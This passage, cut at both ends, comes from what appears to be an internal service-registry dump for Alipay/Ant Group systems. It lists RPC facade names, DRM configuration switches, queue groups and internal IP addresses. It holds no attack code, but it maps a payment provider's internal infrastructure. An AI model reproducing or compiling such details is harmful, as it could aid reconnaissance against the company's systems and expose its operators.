eragreement.facade.UserAgreementRzoneQueryFacade:1.0@DEFAULT@cashiercloud_taobao#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:csinsight@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservicesinspect.service.facade.stress.TinyAppStressFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.gfinsight.service.api.forecast.ForcastFMSettingSceneFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:antPrivacyNode_ProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.159.247.58#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.pcreditschedule.service.facade.spi.ExecuteService:1.0:pcplan_stop_pay@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.permlimit:name=com.alipay.permlimit.nearshare.drm.CommonSwitchConfig.sceneCalc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.sofa.rpc.elastic.ElasticService:1.0:adexchange@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:pcmng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.common.service.facade.admin.api.CommonAdminShutupUserFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minicenter.common.service.facade.api.codetemplate.CodeTemplateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cspushgw.service.facade.PushMessageService:1.0.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.client.paymentPeakQueue#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.zdatacontext:name=com.alipay.zdatacontext.common.agent.drm.UniformAssertClientDRM.testDrMode,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.poscore:name=com.alipay.common.tracer.manage.TracerDrm.zdalOcsDigestLogThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.158.0.245#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkinstassetprodmng_processCallbackForInject@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ucdpmng.facade.UcdpCdrmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afts.common.service.facade.AsrFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.filecore.service.facade.spi.FileAssembleCallBack:1.0:instbill@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfoprod.common.service.cds.facade.CdsSimpleTaskFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:fccustmng_mp_isv_black_edit@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.bizfundprod.common.service.facade.spi.mobilegw.FundOrderFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.airbops.service.common.proxy.cif.facade.ProxySecurityProductApplyQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dcepcoin.core.service.processor.LdcProcessor:1.0:nvwaCoinWithdrawSplitProcessor@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.88.131#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.poscore.common.service.facade.creditcardfp.FastPayOrderQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilityprod.common.service.facade.AbilityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.query.FrontRepositoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.prizecore.common.service.facade.mng.TmallBenefitToolService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finpromobus.common.service.facade.thirdparty.FpsBlockManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.sofa.rpc.elastic.ElasticService:1.0:appxprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.minitrans.core.config.ReconTypeCategroyCodeCache:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.workflow.WorkflowConsultationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitycap:name=com.alipay.cif.utils.probe.ProbeDrmSwitch.period,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.160.158.242#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.acdoccore.common.service.facade.category.CategoryPubFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","Alipay.opinioncore:name=com.alipay.opinioncore.common.drm.SpiderSocialSentimentDrm.sourceTypeDesc,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.certifymng.permlimitDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.mapi.gateway.invoke.webservice.SysExterfaceInvokeService:1.0:databizprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.opscloudcore.framework.core.facade.OpscloudClientServiceFacade:1.0:iarcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.riskmng.common.service.facade.api.RiskTaskActionExecuteFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.tairmanager.application.service.tair.namespace.NamespaceTaskOfflineService:1.0:devNamespaceTaskOffline@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.55.193.83#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.openeval.core.service.emulator.dal.logsim.labtaskreplaylinedata.OeEmulatorLabTaskReplayLineDataResultRepository:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zqueue.server.sigma-job-5fe07fbfd8ce5803a4a182cf-random-m46hs-25mz9.qaZQueue48#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:bkmissione_workOrderApproveFailCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antfin.inclusionconf.facade.service.conference.AgreementFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.securitydata:name=com.alipay.securitydata.common.service.indicator.drm.SnapShotPubConfigResource.pubSnapShot,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:promobench_ReformCommonProcessCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.dataphin.oa.bpms.operate.BpmsOperateService:1.0:dpoa@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.160.222.103#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","NS_Sub_Servers_TP_F_INSTRISKCENTER#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.findefencecore.common.service.replays.TraceInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.mosng.MosngAdapterService:1.0:cstrategycenter@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers__NS_100.83.95.178_notify#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.infosec.content.service.facade.RiskAccumulateService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fc.prodquery.common.service.facade.standard.api.product.ProductTemplateQueryStdFacade:1.0:ANTGW2CN@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatacontext:name=com.alipay.datacontextlib.dataswap.spi.drm.DataSwapGlobalParamDrm.clientGrayStore,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.kbtraffic.common.service.facade.api.schedule.ScheduleEntityQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iotcore.spi.MessageSpi:1.0:iotcmgr@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.88.189#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_30.50.114.60#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.securitydata.common.service.facade.blackitem.BlackItemTRService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finfundtaskcenter.clear.common.service.facade.InstanceManageFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.vega.core.service.DtoLoadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SOFA-DEMO#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.psbp.common.service.ins.InsuranceInstitutionCityFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.nodejs.ConsumerService:1.0:fincardbff@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.imerchopmng.merchant.common.service.facade.api.CrmMerchantAccountInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.developerforum.service.Search:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.50.48.78#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.ptcore.common.service.facade.api.cgtct.CgtCtRelQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.abilitycore.common.service.facade.solution.callback.SceneApplyCallback:1.0:createBusinessAreaCallback@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.app.PublicCustomZoneFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.88.51.190#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.argo.service.facade.DeployEngineFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antcloud.dsrconsole.common.service.facade.DrmServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.huabei.facade.HuabeiRescueServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","contentmng@msgbrokerMosn#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.archimedes.common.service.facade.api.FileUploadService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.uemprod.common.service.facade.bma.coupon.CouponReportQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inscommunity.common.service.facade.TopicFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.dataclean.forum.hbase.daointerface.QaCommunityCleanHAO:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.antcloud.dds.zdal.interfaces.endpoint.facade.rest.UserRestFacade#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.cifcommon.business.platform.enterprise.facade.EntRolePrincipalRelationQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.wishTairCache.serializationType,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordermng.common.service.api.order.SimpleOrderOperateService:1.0:ordermng@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Servers_TP_Q_QUALITY#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.83.0.3#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","DATA_ID_100.83.89.244#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.seekers.facade.apis.EventCaseQueryServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.contentlib.common.service.facade.vtask.ProductQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.kwlib:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.superapi.common.core.client.AppInvokeService:1.0:twcprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.tradeexprod:name=com.alipay.dtqualitycore.drm.DataqualityConfigDrm.storeValidateDetail,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.finfundprod.common.service.facade.FinFundAppointmentQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.antmembermng.common.service.facade.generalconfig.GeneralConfigImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","HEALTHY_V2@transfercenter#@#DEFAULT_INSTANCE_ID#@#SOFA-HEALTHY","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.finfocoreRzoneTair_dest.compressionThreshold,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_11.166.191.219#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.crmhome.common.service.facade.api.leads.MerchantSaleLeadsFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iopengw.service.facade.IClusterMappingService:1.0:iopengw@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.iconnect.common.facade.api.DeliveryAdGroupQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.sofa.rpc.elastic.ElasticService:1.0:quotnearsource@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.mrchprod.api.ops.genericinvoke.SofaServiceHelper:1.0:merchant@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.afsc.common.service.ruleengine.service.ReTechScriptServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","NS_Pub_Servers_TP_F_ACCORE#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","com.alipay.timeout.common.service.facade.spi.TimeoutCallbackHandler:1.0:openitemcore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_SCCORE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.73.188.117#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.poscore:name=com.alipay.cif.l2cache.L2CacheClientSwitch.readL1Cache,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.virtualprod.common.service.facade.lottery.LotteryTradeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mpromocenter.recruit.platform.service.facade.api.PlanQueryService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.kmi.common.service.facade.KeyManagerFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","DATA_ID_10.15.237.130#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.bbcmng.immunemng.facade.ImmDebugFacade:1.0:bkcheck@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbadvert.biz.delivery.rpc.AdvDiscountSendRpcService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.cloudinc:name=com.alipay.slaguard.common.drm.SlaGuardConfigDrm.injectClosed,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pointcore.common.service.facade.DepositQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.financemng.common.facade.service.mortgage.facade.DisposeOperateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.mobileappcommon.common.service.facade.baas.CategoryConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","Alipay.zskynet:name=com.alipay.common.security.dresource.SecurityCommonDrm.xssJsonValueFilterEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.keplerfeature:name=com.alipay.vega.integration.kepler.drm.TraceDrm.condition,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ap.gloancore.common.service.facade.bill.api.LcUserTimeOptFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","SOFA_PRC_TRANSMIT_QARUNTIMEDATASRCMNG#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mcomment.rpc.TopicH5Rpc:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.182.215#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.fc.process.common.service.facade.callback.ProcessCallback:1.0:new-compmng-uploadVoucherCallBack@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.mwalletmng:name=com.alipay.mwalletmng.web.infoview.drm.InfoviewResourceDRM.rejectReason,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.appstore.common.service.facade.commodity.BumngCommodityShopOperationFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.common.core.client.AppInvokeService:1.0:finquotationcenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.dk.common.service.facade.monitor.CustomAlarmFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_30.52.186.74#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.mfinsnsprod.biz.service.gw.community.api.friendships.RelationManager:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mobilegw.adapterservice.MobileAdapterService:1.0:paygrowth@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secucommunity.speech.api.comment.CommentFacadeNew:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchprod.common.service.facade.datafactory.DataFactoryTaskTrFacade:1.0:shopEvaluateSyncHandler@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mdatadecision.common.service.integration.icrowd.PromoMatchFacadeClient:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.zpaas.zappinfo.facade.update.AppExtInfoUpdateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipayplus.mobile.component.common.facade.f2fpay.F2fPayDecodeService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","com.alipay.superapi.common.core.client.AppInvokeService:1.0:authprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.cloud.apfasmng.common.service.facade.appinstancegroup.AppInstanceGroupFacade:1.0:default@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.lifemng.facade.ccr.CreditRefundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.mrchpoint.facade.MrchPointHbaseServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.caprod.service.ukey.facade.UkeyInfoQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.167.116.214#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.cif.facade.CreditAgreementService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alibaba.dt.onedata.dwm.client.oem.LogicTableOperateOpenService:1.0:dpblackbox@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.meta:name=com.alipay.routeclient.DefaultRouteCoordinator.drFlagEnable,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.finpwm.biz.starwish.drm.impl.StarWishDrmImpl.antFarmPromoSearchCode4PressTest,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.necquery.common.service.transaction.RepayTransListQueryNewFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.airbops:name=com.alipay.common.webx.session.drm.SessionLogDrm.isPrintDetails,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.pcreditmarket.service.PcreditUserAccountFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipayplus.mobile.component.common.facade.codec.CodecBindingServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiscore.common.service.facade.MrchisOperationPermissionConfigFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","config:com.alipay.itemcore.common.service.facade.v2.InventoryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA.CONFIG","NS_Sub_Servers_TP_S_1219#@#DEFAULT_INSTANCE_ID#@#DEFAULT_GROUP","DATA_ID_100.82.87.145#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.criskcenter.common.service.facade.legal.InfoLegalKeyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ebppgw.facade.DeductSignFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.secuinfos.common.service.facade.api.AnnouncementInfoFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.inshealthprod.facade.SumInsuredQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.airbops.apayfundZdalDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.rpc.common.service.facade.SampleService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ipromotion.common.service.facade.api.campaignv2.CampInfoQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.69.243.21#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","Alipay.zdaljdbc:name=com.alipay.zdal.ldc.jdbc.finbatch.finreconFailoverDataSource.keyWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ordercore.mrch.common.service.api.NotifyFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdaltair:name=com.alipay.zdal.ldc.tair.iacquirefrontTairCache.ldcTairWeight,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.antgroup.ray.serving.common.service.facade.EndpointRoutingService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_100.83.128.10#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","SOFA_PRC_TRANSMIT_ILIQUIDITY#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finstore.common.service.facade.fop.api.ShopDecorateFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.giftprod.common.service.facade.GiftCrowdFlowQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.normalapp:name=com.alipay.sla.businessgray.drm.BusinessGrayPolicy.globalGrayVersion,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.assettrans.facade.ecf.api.EcftransQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.fininfo:name=com.alipay.zcache.tbase.fininfoDataTairCache.localCacheSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","DATA_ID_30.50.54.64#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.certify.service.facade.CertifyImportFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mytradeprod.common.service.facade.TradeQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchservbase.biz.service.mrchpoint.facade.MrchPointItemQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.settlecore.service.facade.bankcode.BankcodeQueryService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchiswisdom.paidan.common.service.facade.mng.issue.IssueMngQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.resultwrap:name=com.alipay.routeclient.DefaultRouteCoordinator.stressSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.ropcn.common.service.facade.api.CheckStandardService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.publiccore.common.service.facade.template.PublicMsgTemplateFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.etetestcore.service.api.MarketActivityFundcoacherService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.poscore:name=com.alipay.poscore.common.service.integration.drm.impl.DrmResourceTrigger.cardTabKeyMapDataStr,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.finpwm:name=com.alipay.cif.model.cache.CifCOControlSwitch.switchCurUserStatus,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","Alipay.riskmng:name=com.alipay.mitemcenter.common.service.facade.utils.ldc.ICLdcRzDrm.loadTestRZoneOpen,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.exriskcenter.common.service.facade.api.query.ExPredictTradeQueryFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mrchcommerce.fmcgcore.common.service.facade.category.api.CategoryQueryFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","DATA_ID_11.124.33.176#@#DEFAULT_INSTANCE_ID#@#SOFA_ROUTER","com.alipay.finfundbankcore.common.service.facade.FundBankCustodyTransferInFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.kbopenprod.common.service.facade.commodity.CommodityOrderFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.lendpofprod:name=com.alipay.lendpofprod.biz.service.impl.support.drm.LpAdminDrm.closeLendSwitch,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOFA.DRM","com.alipay.zscale.api.ModelLabFacade:1.0:instscalecalc@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.mservice.common.service.facade.api.AtsCaseMaintainFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.superapi.client.SystemAppInvokeService:1.0:iexratecenter@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.fincommontaskhub.service.facade.schedule.TaskhubSofaScheduler:1.0:finopencore@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.databus.common.service.facade.DataRecoverService:1.0:busYuebao@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.aliminiabilityprod.facade.api.AliJsApiFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.finannafccore.common.service.facade.cp.api.CpFundFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.pcactivitycore.facade.content.ProductContentServiceFacade:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.custdecision.service.questionnaire.QuestionnaireDataFacade:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.ropcn.common.service.facade.api.CheckStandardService:1.0@XFIRE#@#DEFAULT_INSTANCE_ID#@#SOFA","com.alipay.unitradeprod.common.facade.service.UnitradeprodAdapterFacade:1.0:unitradeprod@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","com.ipay.ifundcontrolmodel.core.service.fundmodel.scene.balancecheck.support.BalanceCheckFundModelService:1.0@DEFAULT#@#DEFAULT_INSTANCE_ID#@#SOFA","Alipay.zdatabus:name=com.alipay.zdatabus.common.agent.drm.IsolateClientDRM.stage,version=3.0@DRM#@#DEFAULT_INSTANCE_ID#@#SOF